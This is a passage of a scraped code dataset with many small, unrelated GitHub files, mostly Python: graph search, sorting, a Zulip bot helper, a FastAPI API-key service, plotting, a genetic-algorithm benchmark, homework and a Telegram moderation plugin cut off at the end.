self.DFSRec(s,visited)\n def DFS2(self,s):\n visited=[False for _ in range(len(self.graph))]\n queue=[]\n queue.append(s)\n visited[s]=True\n while queue:\n s=queue.pop()\n print(s)\n for i in self.graph[s]:\n if not visited[i]:\n queue.insert(0,i)\n visited[i]=True \n\n\nif __name__ == '__main__':\n g=Graph()\n g.addEdge(0, 1) \n g.addEdge(0, 2) \n g.addEdge(1, 2) \n g.addEdge(2, 0) \n g.addEdge(2, 3) \n g.addEdge(3, 3) \n g.DFS(0)\n","repo_name":"Rohithgilla12/Algos","sub_path":"dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8982417041","text":"import re\nfrom datetime import datetime\nfrom typing import List\n\nfrom src.models.schemas import Message\n\n\ndef format_messages(messages: List[Message]) -> List[str]:\n all_items = []\n\n for message in messages:\n cleaned = remove_delphos_messages(message.content, message.sender_email)\n cleaned = remove_quotes(cleaned)\n cleaned = remove_mentions(cleaned)\n\n if cleaned:\n all_items.append(\n f\"{datetime.fromtimestamp(message.timestamp)} \"\n f\"{message.sender_full_name}: {cleaned}\"\n )\n\n return all_items\n\n\ndef remove_delphos_messages(message: str, sender_email: str) -> str:\n is_delphos_sender = sender_email == \"delphos-bot@zulip.monadical.com\"\n is_delphos_message = message.startswith(\"@**Delphos**\")\n if is_delphos_sender or is_delphos_message:\n return \"\"\n return message\n\n\ndef remove_quotes(message: str) -> str:\n if \"** [said](\" in message:\n message = re.sub(r\"@_\\*\\*(.*?)\\):\", \"\", message)\n message = re.sub(r\"```quote\\n(.*?)\\n```\", \"\", message)\n message = re.sub(r\"^\\s+|\\s+$\", \"\", message)\n return message\n\n\ndef remove_mentions(message: str) -> str:\n return message.replace(\"**\", \"\")\n","repo_name":"juanArias8/zulip-delphos-bot","sub_path":"src/operators/search/utils/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13942225590","text":"# -------------------------------------------------------------------------\n# File: mb_monster.py\n# Created: Tue Feb 7 20:26:02 2006\n# -------------------------------------------------------------------------\n\nimport random\nimport string\n\nimport mb_io\nimport mb_subs\nfrom mb_monster import Monster\n\nclass Player(Monster):\n \"\"\"\n The Player is considered a special type of monster with a few more\n game book keeping related attributes. The Player is considered\n a singleton but the creation of only one player is handled outside\n of this class.\n \"\"\"\n\n def __init__(self, gamedir, filename = None):\n\n \"\"\"\n Initialize player.\n \"\"\"\n\n # The following attributes are internal and are not\n # defined in the file.\n\n self.game_dir = gamedir\n self.last_dir = ''\n\n # Last direction that sprite was facing.\n\n self.last_sprite_facing = None\n\n # The following can be specified in the Player config\n # file in addition to any Monster attributes. If they\n # are not defined in the file, they will use these\n # defaults.\n\n self.extra_lives = 3\n self.start_x = 200\n self.start_y = 200\n\n # Read Monster attributes from file.\n\n Monster.__init__(self, self.game_dir, filename)\n self.read_in_config(filename)\n\n def read_in_config(self, filename):\n\n parser = Monster.read_in_config(self, filename)\n\n if parser.has_section('game'):\n\n if parser.has_option('game', 'extra_lives'):\n self.extra_lives = int(parser.get('game', 'extra_lives'))\n if parser.has_option('game', 'start_x'):\n self.start_x = int(parser.get('game', 'start_x'))\n if parser.has_option('game', 'start_y'):\n self.horns = int(parser.get('game', 'start_y'))\n\n return parser\n\n\n\n","repo_name":"CodeChopper/home","sub_path":"python/MonsterBattle/mb_player.py","file_name":"mb_player.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24718174664","text":"from fastapi import FastAPI, Depends, HTTPException\nfrom fastapi.security import APIKeyHeader\nfrom fastapi.responses import JSONResponse\nfrom datetime import datetime, timedelta\nimport uvicorn\nimport secrets\nimport hashlib\nimport mysql.connector\n\napp = FastAPI()\nsessions = {}\n\nAPI_KEY_NAME = \"api_key\"\napi_key_header = APIKeyHeader(name=API_KEY_NAME)\n\ndef get_db_connection():\n conn = mysql.connector.connect(\n host=\"localhost\",\n port = '3307',\n user=\"root\",\n password=\"\",\n database=\"login_management_db\"\n )\n return conn\n\ndef encrypt_key(key: str):\n return hashlib.sha256(key.encode()).hexdigest()\n\ndef get_api_key(api_key: str = Depends(api_key_header)):\n print(api_key)\n conn = get_db_connection()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM user WHERE api_key=%s\", (api_key,))\n user = cursor.fetchone()\n if not user:\n raise HTTPException(status_code=400, detail=\"User does not exist\")\n if user[5] < datetime.now():\n raise HTTPException(status_code=402, detail=\"Key expired\")\n return api_key\n\n@app.post(\"/register\")\ndef register(username: str, email: str):\n api_key = secrets.token_hex(5)\n encrypted_key = encrypt_key(api_key)\n expiry_date = datetime.now() + timedelta(days=365)\n conn = get_db_connection()\n cursor = conn.cursor()\n cursor.execute(\"INSERT INTO user (username, email, api_key, createdon, validtill) VALUES (%s, %s, %s, %s, %s)\", (username, email, encrypted_key, datetime.now(), expiry_date))\n conn.commit()\n return {\"api_key\": api_key}\n\n@app.get(\"/user/authenticate\")\ndef authenticate(api_key: str = Depends(get_api_key)):\n session_id = secrets.token_hex(16)\n sessions[session_id] = api_key\n response = JSONResponse(content={\"status\": \"success\"})\n response.set_cookie(key=\"session_id\", value=session_id)\n return response\n\n@app.get(\"/getUserData\")\ndef get_user_data(session_id: str = Depends(lambda: Depends(lambda x: x.cookies.get(\"session_id\")))):\n if session_id not in sessions:\n raise HTTPException(status_code=401, detail=\"Not authenticated\")\n api_key = sessions[session_id]\n conn = get_db_connection()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM user WHERE api_key=%s\", (api_key,))\n user_data = cursor.fetchone()\n return {\"username\": user_data[1], \"email\": user_data[2]}\n\nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", reload=True, log_level=\"debug\")","repo_name":"aryanaryachoudhary/fastapiweb","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21059739627","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n-------------------------------------------------\n File Name: excel_converter\n Description :\n Author : patrick\n date: 2019/10/21\n-------------------------------------------------\n Change Activity:\n 2019/10/21:\n reference site: http://www.python-excel.org/\n-------------------------------------------------\n\"\"\"\n__author__ = 'patrick'\n\nfrom openpyxl import Workbook\n\n\ndef convert_list_to_excel(content, file_name, *headers):\n column_range = len(headers)\n content.insert(0, headers)\n wb = Workbook()\n ws = wb.active\n for row_index in range(len(content)):\n for col_index in range(column_range):\n ws.cell(row=row_index + 1, column=col_index + 1).value= content[row_index][col_index]\n # print(index)\n return wb.save(file_name)\n\n\nif __name__ == '__main__':\n result = convert_list_to_excel([(\"test1\", \"test2\", \"test3\"), (\"test1\", \"test2\", \"test3\")\n ], \"test_exel.xls\", \"th1\", \"th2\", \"th3\")\n# print(result)\n","repo_name":"qdriven/low-code-way","sub_path":"topics/tester-ops/tops/testcases/excel_converter.py","file_name":"excel_converter.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5449836478","text":"l = list(map(int,input().split()))\np = l[0]\nc = l[1]\nflag = False\nn=1\nwhile not flag:\n f = n*p\n if f%10 ==0:\n r=n\n flag= True\n elif (f-c) % 10 == 0:\n r = n\n flag = True\n else:\n n+=1\n\nif flag:\n print(r)","repo_name":"Shidhani/cp","sub_path":"Sheet/Buy a Shovel.py","file_name":"Buy a Shovel.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70092605610","text":"# main.py\n\n# Importazione delle classi e moduli necessari\nimport os\nfrom video import Video\nfrom Voice import Voice\nfrom diarize import diarize_audio\nfrom synth import synthesize_audio\nfrom vocal_isolation import isolate_vocals\nfrom tabs import ListStreamsTab, ConfigureVoiceTab, SubtitlesTab\nfrom app_state import AppState\nfrom utils import create_output_dir\n\n# Funzione per l'isolamento vocale\ndef separate_file(audio_path):\n separator = Separator('spleeter:2stems')\n output_dir = os.path.join(os.path.dirname(audio_path), 'output')\n os.makedirs(output_dir, exist_ok=True)\n separator.separate_to_file(audio_path, output_dir)\n\n# Funzione per il mixing dell'audio isolato con l'audio di background\ndef mix_audio(isolated_audio_path, background_audio_path, output_path):\n isolated_audio = AudioSegment.from_wav(isolated_audio_path)\n background_audio = AudioSegment.from_wav(background_audio_path)\n mixed_audio = background_audio.overlay(isolated_audio)\n mixed_audio.export(output_path, format='wav')\n\ndef main():\n # Creazione di una istanza di AppState\n app_state = AppState()\n\n # Creazione di un'istanza di Video\n video = Video(\"C:\\\\percorso\\\\del\\\\tuo\\\\video.mkv\")\n\n # Diarizzazione audio\n audio_diarization_result = diarize_audio(\"percorso_del_tuo_file_audio.wav\")\n\n # Sintesi vocale\n synthesized_audio = synthesize_audio(\"Testo da sintetizzare\")\n\n # Isolamento delle voci\n isolated_audio = isolate_vocals(\"percorso_del_tuo_file_audio.wav\")\n\n # Esegui l'isolamento vocale\n audio_path = 'C:/path/to/audio.wav' # Sostituisci con il tuo percorso\n separate_file(audio_path)\n\n # Esegui il mixing con un'immaginaria traccia audio di background\n isolated_audio_path = 'C:/path/to/output/audio/vocals.wav' # Sostituisci con il percorso effettivo\n background_audio_path = 'C:/path/to/background_audio.wav' # Sostituisci con il tuo percorso\n output_path = 'C:/path/to/output/mixed_audio.wav' # Sostituisci con il tuo percorso\n mix_audio(isolated_audio_path, background_audio_path, output_path)\n\n # Utilizzo dei moduli delle tabs\n list_streams_tab = ListStreamsTab(None, None)\n configure_voice_tab = ConfigureVoiceTab(None, None)\n subtitles_tab = SubtitlesTab(None, None)\n\n # Altri utilizzi di classi e moduli\n\n # ...\n\nif __name__ == \"__main__\":\n # Creazione della directory di output\n create_output_dir()\n\n # Chiamata alla funzione main()\n main()\n","repo_name":"lonelyuniverse/Itadub","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1455194543","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport wget\nimport os\n\nTICKER = \"CDR\"\nSTART_DATE = \"2018-01-01\"\nEND_DATE = \"2018-12-04\"\nFILENAME = \"data.txt\"\n\nif os.path.exists(FILENAME):\n os.remove(FILENAME)\n\nurl = \"https://stooq.pl/q/d/l/?s={0}&d1={1}&d2={2}&i=d\".format(TICKER, START_DATE.replace(\"-\",\"\"), END_DATE.replace(\"-\",\"\")) \nwget.download(url, FILENAME) \n\ndata_frame = pd.read_csv(FILENAME, index_col='Data',\n parse_dates=True, usecols=['Data', 'Zamkniecie'],\n na_values='nan')\n# rename the column header with ticker\ndata_frame = data_frame.rename(columns={'Zamkniecie': TICKER})\ndata_frame.dropna(inplace=True)\nprint(data_frame)\n\n# calculate the standard deviation\nstd_dev = data_frame.rolling(window=20).std()\n# calculate Simple Moving Average with 20 days window\nsma = data_frame.rolling(window=20).mean()\n\nlower_band = sma - 2*std_dev\nlower_band = lower_band.rename(columns={TICKER: \"lower band\"})\n\nupper_band = sma + 2*std_dev\nupper_band = upper_band.rename(columns={TICKER: \"upper band\"})\n\ndata_frame = data_frame.join(upper_band).join(lower_band)\nax = data_frame.plot(title=TICKER)\nax.fill_between(data_frame.index, lower_band['lower band'], upper_band['upper band'], color='#5F9F9F', alpha='0.15')\nax.set_xlabel('Date')\nax.set_ylabel('Price')\nax.grid()\nplt.show(block=True)\n\n","repo_name":"marianwitkowski/python-ml","sub_path":"bollinger-bands.py","file_name":"bollinger-bands.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71577005608","text":"import random\nimport math\n\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom deap import algorithms\n\ncreator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,))\ncreator.create(\"Individual\", list, fitness=creator.FitnessMin)\n\ntoolbox = base.Toolbox()\ntoolbox.register(\"attr_float\", random.uniform, -5.12, 5.12)\ntoolbox.register(\"individual\", tools.initRepeat, creator.Individual, \n toolbox.attr_float, 100)\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\ndef evaluate(individual):\n f = 10.0 * len(individual)\n for x in individual:\n f += x*x - 10.0 * math.cos(2.0 * math.pi * x)\n return f,\n\n# Operator registering\ntoolbox.register(\"evaluate\", evaluate)\ntoolbox.register(\"mate\", tools.cxOnePoint)\ntoolbox.register(\"mutate\", tools.mutGaussian, mu=0.0, sigma=1.0, indpb=0.01)\ntoolbox.register(\"select\", tools.selTournament, tournsize=2)\n\n# RNG seed\nrandom.seed(64)\n\n# Algorithm\nalgorithms.eaSimple(toolbox.population(n=100), toolbox, cxpb=1.0, mutpb=1.0, ngen=1000,\n verbose=False)\n","repo_name":"ChrisTimperley/EC-Software-Benchmarks","sub_path":"setup/deap/rastrigin/rastrigin.py","file_name":"rastrigin.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12893566812","text":"from django_elasticsearch_dsl.management.commands.search_index import (\n Command as SearchIndexCommand,\n)\n\nfrom peeringdb_server.context import incremental_period\n\n\nclass Command(SearchIndexCommand):\n \"\"\"\n Extends the django_elasticsearch_dsl search_index command to allow incremental updates based\n off of a max-age period\n \"\"\"\n\n def add_arguments(self, parser):\n super().add_arguments(parser)\n parser.add_argument(\n \"--max-age\",\n type=int,\n default=3600,\n help=\"Only update records that have been updated in the last X seconds\",\n )\n\n def handle(self, *args, **options):\n with incremental_period(options[\"max_age\"]):\n super().handle(*args, **options)\n","repo_name":"peeringdb/peeringdb","sub_path":"peeringdb_server/management/commands/pdb_search_index.py","file_name":"pdb_search_index.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"40248015304","text":"def partition(array_in, start_index, end_index):\n \"\"\"Use last element as pivot, move to correct position in sorted array, and place smaller and larger elements around\n it.\n \"\"\"\n smallest_index = (start_index - 1)\n pivot = array_in[end_index]\n\n for element in range(start_index, end_index):\n if array_in[element] < pivot:\n smallest_index = smallest_index + 1\n array_in[smallest_index], array_in[element] = array_in[element], array_in[smallest_index] # Swap elements\n\n array_in[smallest_index + 1], array_in[end_index] = array_in[end_index], array_in[smallest_index + 1]\n\n return smallest_index + 1\n\n\ndef quick_sort(input_array, start_index, end_index):\n if start_index < end_index:\n partition_index = partition(input_array, start_index, end_index)\n quick_sort(input_array, start_index, partition_index - 1) # Sort elements before partition\n quick_sort(input_array, partition_index + 1, end_index) # Sort elements after partition\n\n return input_array\n\n\nif __name__ == \"__main__\":\n arr = [23, 12, 78, 43, 0, 23, 1, 4]\n print(quick_sort(arr, 0, len(arr) - 1))\n","repo_name":"crystalattice/Algorithms_and_Interviews","sub_path":"Chapter 16/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"15435509111","text":"def twoSum(nums,target):\n nums_map = {}\n for i, num in enumerate(nums):\n nums_map[num] = i\n ##키값은 숫자, 값은 인덱스\n for i , num in enumerate(nums):\n if target-num in nums_map and i != nums_map[target-num]:\n ## target- 숫자가 nums_map에 잇고 인덱스가 중복되지 않을 때\n return[i,nums_map[target-num]]\n\nprint(twoSum([2,7,11,15],9))","repo_name":"elice-python-coding/ESNG_season2","sub_path":"List/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9350858337","text":"from math import sqrt\nimport timer\n\n\n@timer.timer\ndef primes(n):\n sieve = set(range(3, n + 1, 2))\n if n >= 2:\n sieve.add(2)\n for i in range(3, int(sqrt(n)) + 1, 2):\n if i in sieve:\n sieve -= set(range(2 * i, n + 1, i))\n return sieve\n\n\n@timer.timer\ndef primes2(n):\n arr = [True] * (n + 1)\n sqrt_n = int(sqrt(n))\n for i in range(2, sqrt_n + 1):\n if arr[i]:\n for j in range(i * i, n + 1, i):\n arr[j] = False\n\n result = []\n for i in range(2, n + 1):\n if arr[i]:\n result.append(i)\n\n return result\n\n\nn = 50\n\nres = primes(n)\nres2 = primes2(n)\nprint(res2)\n\nif res != set(res2):\n print('Error')\n","repo_name":"vchilikov/Olimp","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34893010831","text":"from django.shortcuts import render\nfrom .models import MenuImages\n\n\ndef menu(request):\n \"\"\"\n A View to return the menu.html\n where all menu images are returned\n in a carousel.\n \"\"\"\n menus = MenuImages.objects.all()\n context = {\n 'menus': menus\n }\n return render(request, 'menu/menu.html', context)\n","repo_name":"Code-Institute-Submissions/langs-bar","sub_path":"menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69802076970","text":"'''\nCreated on 2018-09-15\n@author: Andrew Chinique\nPledge: I pledge my honor that I have abided by the Stevens Honor System.\n --Andrew Chinique\n\nCS115 - Hw 2\n'''\nimport sys\nfrom cs115 import map, reduce, filter\nimport dict\n# Be sure to submit hw2.py. Remove the '_template' from the file name.\n\n# Allows up to 10000 recursive calls.\n# The maximum permitted limit varies from system to system.\nsys.setrecursionlimit(10000)\n\n# Leave the following lists in place.\nscrabbleScores = \\\n [ ['a', 1], ['b', 3], ['c', 3], ['d', 2], ['e', 1], ['f', 4], ['g', 2],\n ['h', 4], ['i', 1], ['j', 8], ['k', 5], ['l', 1], ['m', 3], ['n', 1],\n ['o', 1], ['p', 3], ['q', 10], ['r', 1], ['s', 1], ['t', 1], ['u', 1],\n ['v', 4], ['w', 4], ['x', 8], ['y', 4], ['z', 10] ]\n\nDictionary = ['a', 'am', 'at', 'apple', 'bat', 'bar', 'babble', 'can', 'foo',\n 'spam', 'spammy', 'zzyzva']\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n##Dictionary = dict.Dictionary\n\n# Implement your functions here\n\n# Helper Functions\n\ndef appears(e, L):\n '''Returns a boolean whether or not element e appears in a sequence\n input e: an element\n input L: a sequence (list or string)'''\n if L == [] or L == '':\n return False\n elif L[0] == e:\n return True\n else:\n return appears(e, L[1:])\n\n \ndef breakdown(S):\n '''Returns a list of all characters that make up a given sequence\n input S: a sequence'''\n if S == '' or S == []:\n return []\n elif len(S) == 1:\n return [S]\n else:\n return S[0] + breakdown(S[1:])\n\n\ndef removeFirst(e, L):\n '''Returns a list identical to list L\n without the first top-level instance of e.\n input e: an element\n input L: a list'''\n if L == []:\n return []\n elif L == '':\n return ''\n elif L[0] == e:\n return L[1:]\n elif isinstance(L, list) == True:\n return [L[0]] + removeFirst(e, L[1:])\n else:\n return L[0] + removeFirst(e, L[1:])\n\n \ndef listCompose(Rack, S):\n '''Checks whether or not string S can be composed from list R.\n Returns the string if this is true; returns an empty string if false.\n input Rack: a list of lowercase letters\n input S: a string'''\n # in the case of this HW:\n # Rack would be the rack of Scrabble tiles\n # S is any word\n if S == [] or S == '':\n return ''\n elif (S[0] in Rack):\n trimmedRack = removeFirst(S[0],Rack)\n if (S[0] + listCompose(trimmedRack, S[1:])) == S:\n return(S[0] + listCompose(trimmedRack, S[1:]))\n else:\n return listCompose(trimmedRack, S[1:])\n else:\n return ''\n\n\ndef inDictionary(Words):\n '''Tests if string in list Words is a word, as defined by Dictionary.\n Returns the string if true.\n input S: a list of strings'''\n if Words == []:\n return []\n elif Words[0] in Dictionary:\n return [[Words[0]] + [wordScore(Words[0], scrabbleScores)]] + inDictionary(Words[1:])\n else:\n return inDictionary(Words[1:])\n \n\n \ndef possibleWords(Rack, Dictionary):\n '''Returns a list of all possible words in list Dictionary\n that can be made from a given list of lowercase characters.\n input L: a list of lowercase characters'''\n if Rack == []:\n print('Your rack is empty! Draw some tiles.')\n return []\n elif listCompose(Rack, Dictionary[0]) != '':\n return [listCompose(Rack, Dictionary[0])] + possibleWords(Rack, Dictionary[1:])\n elif Dictionary[1:] != []:\n return possibleWords(Rack, Dictionary[1:])\n else:\n return []\n\n\ndef highestScore(scoreList):\n '''Returns the highest scoring word and its point value given\n a list of words and their scores'''\n if len(scoreList) == 0:\n return ['', 0]\n elif len(scoreList) == 1:\n return scoreList[0]\n else:\n if(scoreList[1])[1] > (scoreList[0])[1]:\n (scoreList[0]) = (scoreList[1])\n return highestScore(scoreList[1:])\n else:\n (scoreList[1]) = (scoreList[0])\n return highestScore(scoreList[1:])\n \n\n# Preliminary Functions\ndef letterScore(letter, scorelist):\n '''Returns a list containing the given character and the\n Scrabble score for the given letter\n input letter: a character\n input scorelist: a list of letters and their Scrabble scores'''\n # I recognize that the function is allowed to crash if the given\n # letter is not in scorelist, but I wanted to be able to catch that\n if letter == [] or letter == '':\n return 0\n elif letter not in alphabet:\n print(\"You entered an invalid character! Try again.\")\n return 0\n elif (scorelist[0])[0] == letter:\n return (scorelist[0])[1]\n else:\n return letterScore(letter, scorelist[1:])\n\n\ndef wordScore(S, scorelist):\n '''Returns the Scrabble score of a given string\n input S: a string\n input scorelist: a list of letters and their Scrabble scores'''\n if S == '' or S == []:\n print(\"You didn't enter a word! That's zero points.\")\n return 0\n elif len(S) == 1:\n return letterScore(S, scorelist)\n else:\n return letterScore(S[0], scorelist) + wordScore(S[1:], scorelist)\n\n\n# Endgoal Functions\ndef scoreList(Rack):\n '''Returns a list of all possible words in list Dictionary that can be made\n from a given list of lowercase characters, and their Scrabble scores.\n input Rack: a list of lowercase characters'''\n words = possibleWords(Rack, Dictionary)\n if len(Rack) == 0 or '' in Rack:\n print('Your rack is invalid! Draw some tiles.')\n return []\n else:\n return inDictionary(possibleWords(Rack, Dictionary))\n \n\ndef bestWord(Rack):\n '''Returns a list of two elements: the highest scoring word possible\n made from the characters in list Rack, and that word's score\n input Rack: a list of lowercase letters'''\n if len(Rack) == 0 or '' in Rack:\n print('Your rack is invalid! Draw some tiles.')\n return []\n else:\n return highestScore(scoreList(Rack))\n \n \n \n\n","repo_name":"timid-one/cs-115","sub_path":"Homework/hw2/hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":6257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8573711956","text":"\"\"\"\nLoads details for connecting to known data stores.\n\"\"\"\nfrom collections import namedtuple\n# from contextlib import contextmanager\n# import json\nimport yaml\nfrom .dict_utils import nested_dict_to_namedtuple\n\n\n# class JsonLoader:\n# @staticmethod\n# def __metadata_encoder(src_dict: dict) -> namedtuple:\n# object_name = str.replace(next(iter(src_dict.keys())), 'mappingName',\n# 'MappedDataSet')\n# return namedtuple(object_name, src_dict.keys())(*src_dict.values())\n\n# def load_from_file(file_path: str) -> namedtuple:\n# \"\"\"\n# Extracts the JSON formatted contents of a metadata file to a NamedTuple.\n# Allowing for the use of dot notation in accessing properties.\n# NOTE: Assumes top level is a list. However also assumes there is only one.\n# That is, only returns the first one.\n\n# Args:\n# file_path (str): Filesystem path of JSON file.\n\n# Returns:\n# namedtuple:\n# \"\"\"\n# try:\n# with open(file_path, 'r', encoding=\"utf8\") as srcFile:\n# srcObj = json.load(srcFile,\n# object_hook=JsonLoader.__metadata_encoder)\n\n# except Exception:\n# raise\n\n# return srcObj[0]\n\n\n# class YamlLoader:\n# \"\"\"_summary_\n\n# Returns:\n# _type_: _description_\n# \"\"\"\n\n # @staticmethod\ndef load_from_file(file_path: str) -> namedtuple:\n \"\"\"\n Extracts the YAML formatted contents of a metadata file to a dictionary\n of NamedTuples. Allowing for the use of dot notation in accessing\n properties.\n NOTE: There can be multiple documents/connections in the loaded YAML\n file. Each is added as a keyed entry in the returned object. Using the\n key from the serialised connection object as the key in the\n NamedTuple.\n\n Args:\n file_path (str): Filesystem path of YAML file.\n\n Returns:\n namedtuple:\n \"\"\"\n result_dict: dict = {}\n with open(file_path, 'r', encoding='utf8') as src_file:\n src_obj = yaml.safe_load_all(src_file)\n for conn in src_obj:\n n_tuple = nested_dict_to_namedtuple(conn)\n result_dict[n_tuple.metadata.name] = n_tuple\n return result_dict\n\n\n\n\n# @contextmanager\n# def data_connections_open(file_path):\n# f = open(file_path, 'r', encoding=\"utf8\")\n# try:\n# yield f\n# finally:\n# f.close()\n\n# # example usage\n# with data_connections_open('file') as f:\n# contents = f.read()\n","repo_name":"scott-diprose/pydtm-lib","sub_path":"src/pydtm/data_connection.py","file_name":"data_connection.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2742830235","text":"import math\n\n\ndef func(x):\n return a*x + b*math.sin(x) - c\n\n\ndef mySearch():\n high = 1000000\n low = -1000000\n prev = None\n while prev != round((high+low) / 2.0, 6):\n middle = low + (high-low)/2.0\n f = func(middle)\n if f == 0:\n return round(middle, 6)\n elif f > 0:\n high = middle+1\n else:\n low = middle\n prev = round(middle, 6)\n return prev\n\n\nt = int(input())\n\nfor i in range(t):\n config = input().split()\n a, b, c = [int(x) for x in config]\n print(mySearch())\n","repo_name":"fisheyz/pc2223","sub_path":"SPOJ/SPOJ_triangle.py","file_name":"SPOJ_triangle.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26372538049","text":"class objetJeu:\n\n maxItem = 10\n\n def __init__(self):\n self.catory = \"arme\"\n\n\nclass arme:\n def __init__(self):\n self.name = \"P90\"\n self.munition = \"9mm\"\n\n\nclass fusil(objetJeu, arme):\n def __init__(self):\n objetJeu.__init__(self)\n arme.__init__(self)\n\n\n\nif __name__ == \"__main__\":\n\n fusilSniper = fusil()\n objetJeu = objetJeu()\n arme = arme()\n\n print(fusilSniper.name, fusilSniper.catory)\n print(isinstance(fusilSniper, objetJeu))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# #héritage isinstance, issubclass\n#\n#\n# #class Mère\n# class Humain:\n# def __init__(self, name, age):\n# self.name = name\n# self.age = age\n#\n# def presentation(self):\n# print(f\"je me nomme {self.name}\")\n#\n# #class fille\n# class Etudiant(Humain):\n# def __init__(self):\n# self.category = \"IT\"\n# self.reduct = \"15%\"\n# Humain.__init__(self, \"Olivier\", 30)\n#\n# def etatEtudiant(self):\n# print(f'je vais bien mais j ai bientôt mes partiels')\n#\n#\n# class Employe(Humain):\n# def __init__(self):\n# Humain.__init__(self, \"Olivier2\")\n#\n#\n# if __name__ == \"__main__\":\n# etudiant = Etudiant()\n# human = Humain(\"Elian\", 30)\n# human.presentation()\n#\n# print(isinstance(etudiant, int))\n# print(issubclass(Etudiant, Humain))\n# print(issubclass(Humain, Etudiant))\n","repo_name":"Misteur54/ifa-python","sub_path":"Jour3/ex03/demo_ifa.py","file_name":"demo_ifa.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5580597265","text":"from pyrogram.errors import (\n PeerIdInvalid,\n UserAdminInvalid,\n UsernameInvalid,\n UsernameNotOccupied,\n)\nfrom pyrogram.types import ChatPermissions\n\nfrom telegram_bot import listener, plugin\nfrom telegram_bot.utils import (\n ParsedChatMember,\n extract_time,\n extract_user,\n extract_user_and_text,\n user_ban_protected,\n)\n\n\nclass Muting(plugin.Plugin):\n name = \"Muting\"\n helpable = True\n\n async def parse_member(self, user_ids) -> ParsedChatMember:\n \"\"\"Get member atrribute\"\"\"\n member = await extract_user(self.bot.client, user_ids)\n return ParsedChatMember(member)\n\n async def _muter(self, message, user_id, time=0):\n chat_id = message.chat.id\n try:\n member = await message.chat.get_member(user_id)\n if member.can_send_messages is False and time == 0:\n await message.reply_text(await self.bot.text(chat_id, \"already-muted\"))\n return False\n await self.bot.client.restrict_chat_member(chat_id, user_id, ChatPermissions(), time)\n return True\n except (UsernameInvalid, UsernameNotOccupied, PeerIdInvalid):\n await message.reply_text(await self.bot.text(chat_id, \"err-invalid-username-id\"))\n return False\n except UserAdminInvalid:\n await message.reply_text(await self.bot.text(chat_id, \"cant-mute-admin\"))\n return False\n\n @listener.on(\"mute\", can_restrict=True)\n async def mute(self, message):\n \"\"\"Mute chat member\"\"\"\n chat_id = message.chat.id\n user_id, res = extract_user_and_text(message)\n if not user_id:\n return await message.reply_text(await self.bot.text(chat_id, \"no-mute-user\"))\n if user_id in [self.bot.identifier, f\"@{self.bot.username}\"]:\n return await message.reply_text(await self.bot.text(chat_id, \"self-muting\"))\n if await user_ban_protected(self.bot, chat_id, user_id):\n return await message.reply_text(await self.bot.text(chat_id, \"cant-mute-admin\"))\n\n if res:\n timeflag = res.split(None, 1)[0].lower()\n until = await extract_time(timeflag)\n if not until:\n return await message.reply_text(await self.bot.text(chat_id, \"invalid-time-flag\"))\n tr_string = \"mute-success-time\"\n else:\n timeflag = None\n tr_string = \"mute-success\"\n until = 0\n muted = await self._muter(message, 